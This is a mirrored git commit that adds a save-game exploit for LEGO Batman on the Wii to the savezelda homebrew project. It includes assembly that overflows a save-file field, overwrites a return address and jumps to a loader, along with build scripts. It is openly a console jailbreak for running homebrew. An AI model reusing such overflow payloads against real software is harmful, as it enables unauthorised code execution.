mirror of
https://github.com/lewurm/savezelda.git
synced 2024-06-09 21:18:45 +02:00
LEGO Batman^H^H^Hhaxx
This commit is contained in:
parent
4d980dfebb
commit
da886e2a72
2
Makefile
2
Makefile
|
@ -52,6 +52,7 @@ all: FORCE .version
|
||||||
$(Q)$(MAKE) -C loader
|
$(Q)$(MAKE) -C loader
|
||||||
$(Q)$(MAKE) -C twilight
|
$(Q)$(MAKE) -C twilight
|
||||||
$(Q)$(MAKE) -C lego
|
$(Q)$(MAKE) -C lego
|
||||||
|
$(Q)$(MAKE) -C batman
|
||||||
|
|
||||||
FORCE:
|
FORCE:
|
||||||
|
|
||||||
|
@ -60,3 +61,4 @@ clean:
|
||||||
$(MAKE) -C loader clean
|
$(MAKE) -C loader clean
|
||||||
$(MAKE) -C twilight clean
|
$(MAKE) -C twilight clean
|
||||||
$(MAKE) -C lego clean
|
$(MAKE) -C lego clean
|
||||||
|
$(MAKE) -C batman clean
|
||||||
|
|
1
batman/.gitignore
vendored
Normal file
1
batman/.gitignore
vendored
Normal file
|
@ -0,0 +1 @@
|
||||||
|
FILE_V28
|
116
batman/Makefile
Normal file
116
batman/Makefile
Normal file
|
@ -0,0 +1,116 @@
|
||||||
|
# Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
|
||||||
|
# This code is licensed to you under the terms of the GNU GPL, version 2;
|
||||||
|
# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
|
||||||
|
|
||||||
|
|
||||||
|
# Configuration:
|
||||||
|
|
||||||
|
# What toolchain prefix should we use
|
||||||
|
CROSS ?= broadway-
|
||||||
|
|
||||||
|
# Where are the tools (http://git.infradead.org/users/segher/wii.git)
|
||||||
|
TOOLS ?= $(HOME)/wii/segher
|
||||||
|
|
||||||
|
# End of configuration.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Set CC, LD, OBJCOPY based on CROSS, unless they are set already
|
||||||
|
|
||||||
|
ifeq ($(origin CC), default)
|
||||||
|
CC := $(CROSS)gcc -m32
|
||||||
|
endif
|
||||||
|
ifeq ($(origin LD), default)
|
||||||
|
LD := $(CROSS)ld
|
||||||
|
endif
|
||||||
|
OBJCOPY ?= $(CROSS)objcopy
|
||||||
|
|
||||||
|
|
||||||
|
# The compiler flags we need.
|
||||||
|
|
||||||
|
CFLAGS := -Wall -W -Os -ffreestanding -mno-eabi -mno-sdata -mcpu=750
|
||||||
|
|
||||||
|
|
||||||
|
# Build with "V=1" to see the commands executed; be quiet otherwise.
|
||||||
|
|
||||||
|
ifeq ($(V),1)
|
||||||
|
Q :=
|
||||||
|
else
|
||||||
|
Q := @
|
||||||
|
MAKEFLAGS += --no-print-directory
|
||||||
|
endif
|
||||||
|
|
||||||
|
|
||||||
|
targets := rlbp.bin rlbj.bin rlbe.bin
|
||||||
|
|
||||||
|
ppms := $(targets:%.bin=%-icon.ppm) rlb-banner.ppm
|
||||||
|
assets := title.bin $(ppms)
|
||||||
|
|
||||||
|
loader := ../loader/loader.bin
|
||||||
|
|
||||||
|
|
||||||
|
titleid = $(shell perl titleid.pl $(1))
|
||||||
|
|
||||||
|
|
||||||
|
define twintig
|
||||||
|
D=$(call titleid,$(1)); \
|
||||||
|
$(TOOLS)/twintig $$D $@ toc-$1
|
||||||
|
endef
|
||||||
|
|
||||||
|
|
||||||
|
all: $(targets)
|
||||||
|
|
||||||
|
$(targets): %.bin: toc-% FILE_V28 $(assets)
|
||||||
|
@echo " TWINTIG $@"
|
||||||
|
$(Q)$(call twintig,$*)
|
||||||
|
|
||||||
|
FILE_V28: head.bin exploit.bin $(loader)
|
||||||
|
@echo " LEGOSTACK $@"
|
||||||
|
$(Q)./pack.sh $@ $^
|
||||||
|
$(Q)$(TOOLS)/lego-cksum $@
|
||||||
|
|
||||||
|
head.bin: head.elf
|
||||||
|
@echo " OBJCOPY $@"
|
||||||
|
$(Q)$(OBJCOPY) -Obinary $< $@
|
||||||
|
|
||||||
|
exploit.bin: exploit.elf
|
||||||
|
@echo " OBJCOPY $@"
|
||||||
|
$(Q)$(OBJCOPY) -Obinary $< $@
|
||||||
|
|
||||||
|
exploit.elf: lego.lds exploit.o
|
||||||
|
@echo " LINK $@"
|
||||||
|
$(Q)$(LD) -T $^ -o $@
|
||||||
|
|
||||||
|
head.elf: head.o
|
||||||
|
@echo " LINK $@"
|
||||||
|
$(Q)$(LD) -e 0 $< -o $@
|
||||||
|
|
||||||
|
exploit.o: exploit.s
|
||||||
|
@echo " ASSEMBLE $@"
|
||||||
|
$(Q)$(CC) $(CFLAGS) -c $< -o $@
|
||||||
|
|
||||||
|
head.o: head.s head.b
|
||||||
|
@echo " ASSEMBLE $@"
|
||||||
|
$(Q)$(CC) $(CFLAGS) -c $< -o $@
|
||||||
|
|
||||||
|
title.bin: ../.version
|
||||||
|
@echo " TITLEBIN $@"
|
||||||
|
$(Q)perl make-title-bin.pl > $@
|
||||||
|
|
||||||
|
../.version: FORCE
|
||||||
|
$(Q)$(MAKE) -C .. .version
|
||||||
|
|
||||||
|
$(ppms): %.ppm: %.png
|
||||||
|
@echo " PPM $@"
|
||||||
|
$(Q)convert $< $@
|
||||||
|
|
||||||
|
$(loader): FORCE
|
||||||
|
$(Q)$(MAKE) -C ../loader
|
||||||
|
|
||||||
|
FORCE:
|
||||||
|
|
||||||
|
clean:
|
||||||
|
-rm -f $(targets) FILE_V28
|
||||||
|
-rm -f exploit.bin exploit.elf exploit.o
|
||||||
|
-rm -f head.bin head.elf head.o
|
||||||
|
-rm -f title.bin
|
45
batman/exploit.s
Normal file
45
batman/exploit.s
Normal file
|
@ -0,0 +1,45 @@
|
||||||
|
# Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
|
||||||
|
# Copyright 2011 Bernhard Urban <lewurm@gmail.com>
|
||||||
|
# This code is licensed to you under the terms of the GNU GPL, version 2;
|
||||||
|
# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
|
||||||
|
|
||||||
|
.section .start,"ax"
|
||||||
|
retadr = 0x90394140
|
||||||
|
|
||||||
|
# The return addr for the nintendo loader is a bit different as for 3rd
|
||||||
|
# party loaders. In fact, it depends which value is set by the apploader at
|
||||||
|
# 0x8000002c:
|
||||||
|
# - 0x0: return address is 0x90394140 (some 3rd party loader, e.g. gecko os)
|
||||||
|
# - 0x23: return address is 0x90394000 (set by the sysmenu loader by nintendo)
|
||||||
|
# 0B ver: 0x90394100
|
||||||
|
# to make both work, we insert some no op's here
|
||||||
|
.fill (0x140/0x4), 4, 0x60000000
|
||||||
|
|
||||||
|
start:
|
||||||
|
# Set up a stack frame.
|
||||||
|
lis 1,0x8080 ; li 0,0 ; stwu 0,-64(1)
|
||||||
|
|
||||||
|
# Stop audio and video.
|
||||||
|
lis 0,audio_stop@h ; ori 0,0,audio_stop@l ; mtctr 0 ; bctrl
|
||||||
|
lis 0,video_stop@h ; ori 0,0,video_stop@l ; mtctr 0 ; bctrl
|
||||||
|
|
||||||
|
# Move code into place; a generous 32kB, starting at 64kB in
|
||||||
|
# the save file.
|
||||||
|
|
||||||
|
lis 3,main@h ; ori 3,3,main@l ; addi 5,3,-4
|
||||||
|
lis 4,(retadr-4)@h ; ori 4,4,(retadr-4)@l
|
||||||
|
# Calculate proper offset for the loader in memory
|
||||||
|
0: lbzu 0,4(4); cmpwi 0,0x60 ; beq 0b
|
||||||
|
addi 4,4,-4; addi 4,4,end-start
|
||||||
|
|
||||||
|
li 0,0x2000 ; mtctr 0
|
||||||
|
0: lwzu 0,4(4) ; stwu 0,4(5) ; bdnz 0b
|
||||||
|
|
||||||
|
# Sync caches on it.
|
||||||
|
li 0,0x0400 ; mtctr 0 ; mr 5,3
|
||||||
|
0: dcbst 0,5 ; sync ; icbi 0,5 ; addi 5,5,0x20 ; bdnz 0b
|
||||||
|
sync ; isync
|
||||||
|
|
||||||
|
# Go for it!
|
||||||
|
mtctr 3 ; bctr
|
||||||
|
end:
|
BIN
batman/head.b
Normal file
BIN
batman/head.b
Normal file
Binary file not shown.
31
batman/head.s
Normal file
31
batman/head.s
Normal file
|
@ -0,0 +1,31 @@
|
||||||
|
# Copyright 2011 Bernhard Urban <lewurm@gmail.com>
|
||||||
|
# This code is licensed to you under the terms of the GNU GPL, version 2;
|
||||||
|
# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
|
||||||
|
|
||||||
|
retadr = 0x90394140
|
||||||
|
0:
|
||||||
|
# stolen from some savegame found in teh intertube
|
||||||
|
.incbin "head.b"
|
||||||
|
|
||||||
|
# give the char a name
|
||||||
|
.ascii "you won't see this " # len = 0x14
|
||||||
|
|
||||||
|
# smash it \o/ 0x1f0+0x4 bytes all in all...
|
||||||
|
.fill (0xf4/4), 4, 0x11111111
|
||||||
|
|
||||||
|
# unlock the character (somewhere here actually...)
|
||||||
|
.fill (0x10/4), 4, 0x90c10104
|
||||||
|
|
||||||
|
# add more padding...
|
||||||
|
.fill (0xdc/4), 4, 0x11111111
|
||||||
|
|
||||||
|
# now we at the actual vuln return address
|
||||||
|
# just point to the loader of the loader (= content of exploit.s)
|
||||||
|
.long retadr
|
||||||
|
|
||||||
|
# alternatively you can put the code here too and jump into the stack,
|
||||||
|
# however then you have to take care for nullbytes in the resulting
|
||||||
|
# bytecode, which is a way too tedious. so we just take the further slot for
|
||||||
|
# it :-) (LEGO devs are nice ppl, heh)
|
||||||
|
|
||||||
|
.fill 0x10000 - (. - 0b)
|
22
batman/lego.lds
Normal file
22
batman/lego.lds
Normal file
|
@ -0,0 +1,22 @@
|
||||||
|
/* Copyright 2008-2009 Segher Boessenkool <segher@kernel.crashing.org>
|
||||||
|
This code is licensed to you under the terms of the GNU GPL, version 2;
|
||||||
|
see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt */
|
||||||
|
|
||||||
|
OUTPUT_FORMAT("elf32-powerpc")
|
||||||
|
OUTPUT_ARCH(powerpc:common)
|
||||||
|
|
||||||
|
SECTIONS {
|
||||||
|
audio_stop = 0x8009cfa0;
|
||||||
|
video_stop = 0x800ab190;
|
||||||
|
|
||||||
|
main = 0x90000020;
|
||||||
|
|
||||||
|
.twilight 0x90394000:
|
||||||
|
{
|
||||||
|
rlb*.o(.start)
|
||||||
|
*(.text)
|
||||||
|
*(.rodata .rodata.*)
|
||||||
|
*(.data)
|
||||||
|
*(.bss)
|
||||||
|
}
|
||||||
|
}
|
16
batman/make-title-bin.pl
Executable file
16
batman/make-title-bin.pl
Executable file
|
@ -0,0 +1,16 @@
|
||||||
|
#!/usr/bin/perl
|
||||||
|
sub printline {
|
||||||
|
my $x = shift;
|
||||||
|
chomp $x;
|
||||||
|
$x .= "\0" x 32;
|
||||||
|
$x = substr $x, 0, 32;
|
||||||
|
$x =~ s/(.)/\0$1/g;
|
||||||
|
|
||||||
|
print $x;
|
||||||
|
}
|
||||||
|
|
||||||
|
$name = '"Bathaxx" by lewurm';
|
||||||
|
$version = `cat ../.version`;
|
||||||
|
|
||||||
|
printline $name;
|
||||||
|
printline $version;
|
3
batman/pack.sh
Executable file
3
batman/pack.sh
Executable file
|
@ -0,0 +1,3 @@
|
||||||
|
#!/bin/bash
|
||||||
|
TARGET=$1; shift
|
||||||
|
cat $* /dev/zero | dd bs=1024 count=128 2>/dev/null > $TARGET
|
BIN
batman/rlb-banner.png
Normal file
BIN
batman/rlb-banner.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 17 KiB |
BIN
batman/rlb-banner.ppm
Normal file
BIN
batman/rlb-banner.ppm
Normal file
Binary file not shown.
BIN
batman/rlbe-icon.png
Normal file
BIN
batman/rlbe-icon.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 2.2 KiB |
BIN
batman/rlbe-icon.ppm
Normal file
BIN
batman/rlbe-icon.ppm
Normal file
Binary file not shown.
BIN
batman/rlbj-icon.png
Normal file
BIN
batman/rlbj-icon.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 2.1 KiB |
BIN
batman/rlbj-icon.ppm
Normal file
BIN
batman/rlbj-icon.ppm
Normal file
Binary file not shown.
BIN
batman/rlbp-icon.png
Normal file
BIN
batman/rlbp-icon.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 2.1 KiB |
BIN
batman/rlbp-icon.ppm
Normal file
BIN
batman/rlbp-icon.ppm
Normal file
Binary file not shown.
2
batman/titleid.pl
Executable file
2
batman/titleid.pl
Executable file
|
@ -0,0 +1,2 @@
|
||||||
|
#!/usr/bin/perl
|
||||||
|
print "00010000", map { sprintf "%02x", ord uc } split //, $ARGV[0];
|
4
batman/toc-rlbe
Normal file
4
batman/toc-rlbe
Normal file
|
@ -0,0 +1,4 @@
|
||||||
|
title.bin
|
||||||
|
rlb-banner.ppm
|
||||||
|
rlbe-icon.ppm
|
||||||
|
FILE_V28 FILE_V28
|
4
batman/toc-rlbj
Normal file
4
batman/toc-rlbj
Normal file
|
@ -0,0 +1,4 @@
|
||||||
|
title.bin
|
||||||
|
rlb-banner.ppm
|
||||||
|
rlbj-icon.ppm
|
||||||
|
FILE_V28 FILE_V28
|
4
batman/toc-rlbp
Normal file
4
batman/toc-rlbp
Normal file
|
@ -0,0 +1,4 @@
|
||||||
|
title.bin
|
||||||
|
rlb-banner.ppm
|
||||||
|
rlbp-icon.ppm
|
||||||
|
FILE_V28 FILE_V28
|
Loading…
Reference in New Issue
Block a user